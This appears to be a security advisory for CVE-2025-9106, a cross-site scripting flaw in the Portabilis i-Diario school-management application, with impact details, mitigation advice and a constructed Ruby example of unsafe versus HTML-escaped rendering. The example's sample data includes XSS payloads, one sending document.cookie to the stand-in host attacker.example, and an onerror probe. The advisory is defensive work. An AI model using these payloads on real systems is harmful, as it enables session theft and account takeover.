Platform: php
Fixed in: 1.0.1, 1.1.1, 1.2.1, 1.3.1, 1.4.1, 1.5.1
CVE-2025-9106 is a cross-site scripting (XSS) vulnerability affecting Portabilis i-Diario versions 1.0 through 1.5.0. It lets an attacker inject script into content the application later renders to other users, putting their sessions and data at risk. A fix is available in version 1.5.1, and the vulnerability details have been publicly disclosed.
The flaw allows an attacker to run arbitrary JavaScript in the browser of any user who views the affected page. Typical consequences are theft of session cookies or tokens, actions performed in the victim's name, redirection to phishing pages, and defacement of the interface. Because i-Diario is a school-management application, successful exploitation can expose student records, teacher information and curriculum content. The public availability of an exploit raises the likelihood of opportunistic attacks against unpatched installations.
A proof-of-concept exploit has been published alongside the vulnerability details. The CVSS base score of 3.5 (LOW) reflects that the impact of a single exploitation is limited and that the attack conditions are constrained, for example by requiring the attacker to have access to the affected input fields and the victim to load the affected page. The CVE is not listed on CISA KEV, but the public exploit warrants close monitoring.
Exploit Status: public proof-of-concept disclosed; not listed on CISA KEV
EPSS: 0.04% (11th percentile)
The primary mitigation for CVE-2025-9106 is to upgrade to Portabilis i-Diario version 1.5.1 or later. If an immediate upgrade is not feasible, make sure that user-supplied data shown on the /planos-de-ensino-por-disciplina/ page is HTML-encoded on output; input validation on the same fields is a useful second layer but does not replace output encoding. A web application firewall (WAF) with rules that block common XSS payloads can provide temporary protection while the upgrade is scheduled, with the usual caveat that WAF rules are bypassable and must not be treated as the fix.
The vendor advice is to update i-Diario to a version later than 1.5.0 that corrects the XSS. Where no such version can be deployed yet, review and filter the contents of the 'Parecer', 'Conteúdos' and 'Objetivos' fields on the /planos-de-ensino-por-disciplina/ page to prevent injection of malicious code.
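The following is an added, constructed example, not code from the i-Diario project or from the advisory. It illustrates the difference between the two renderings described above: a view that interpolates the 'Parecer', 'Conteúdos' and 'Objetivos' fields straight into HTML, and one that HTML-encodes them for the element-body context first. It is written in Ruby because i-Diario itself is a Ruby on Rails application; the field values, the element layout and the helper names are illustrative assumptions, and ERB::Util.html_escape is the standard-library primitive that Rails' default <%= %> escaping is built on.

```ruby
require "erb"

# Constructed sample: the three free-text fields named in the advisory, each
# carrying an illustrative XSS probe. These are not the real reported payloads.
TEACHING_PLAN = {
  "Parecer"   => %q{Bom desempenho <script>document.location='https://attacker.example/?c='+document.cookie</script>},
  "Conteúdos" => %q{Frações <img src=x onerror="alert(1)">},
  "Objetivos" => %q{Ler e escrever "textos" curtos}
}.freeze

# Vulnerable rendering (assumed shape of the bug): user-supplied text is
# interpolated into the HTML body without encoding, so any tag in the value
# becomes part of the page and runs in every viewer's browser.
def render_plan_unsafe(plan)
  plan.map { |label, value| "<dt>#{label}</dt><dd>#{value}</dd>" }.join("\n")
end

# Hardened rendering: every value is entity-encoded for the element-body
# context (& < > " ' become entities) before it is placed in the document.
# Non-ASCII text such as "Conteúdos" or "Frações" is left untouched.
def render_plan_safe(plan)
  plan.map do |label, value|
    "<dt>#{ERB::Util.html_escape(label)}</dt><dd>#{ERB::Util.html_escape(value)}</dd>"
  end.join("\n")
end

# Review check: does any input that contains a tag opener still appear
# verbatim in the rendered output? True means raw markup reached the page.
def markup_survives?(html, values)
  values.any? { |v| v.include?("<") && html.include?(v) }
end

if __FILE__ == $PROGRAM_NAME
  puts "--- unsafe ---", render_plan_unsafe(TEACHING_PLAN)
  puts "--- safe ---",   render_plan_safe(TEACHING_PLAN)
  puts "raw markup survives (unsafe): #{markup_survives?(render_plan_unsafe(TEACHING_PLAN), TEACHING_PLAN.values)}"
  puts "raw markup survives (safe):   #{markup_survives?(render_plan_safe(TEACHING_PLAN), TEACHING_PLAN.values)}"
end
```

In a Rails view the equivalent fix is to let the default <%= %> escaping do this work and to remove any raw, html_safe or <%== %> usage around these fields. Encoding for the element body is not sufficient if a value is placed inside an attribute, a URL or inline JavaScript; those contexts need their own encoders, which is why output encoding rather than input filtering is the reliable control.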
CVE-2025-9106 is a cross-site scripting (XSS) vulnerability affecting Portabilis i-Diario versions 1.0 through 1.5.0 that allows attackers to inject malicious scripts into the application.
You are affected if you run any Portabilis i-Diario release from 1.0 up to and including 1.5.0. An upgrade is required.
Upgrade to Portabilis i-Diario version 1.5.1 or later to resolve the vulnerability. Temporary WAF rules can serve as an interim measure until the upgrade is in place.
A public proof-of-concept exploit exists, so active exploitation is possible. Monitor affected systems closely.
Refer to the Portabilis security advisories on the vendor's official website for the latest information and updates regarding CVE-2025-9106.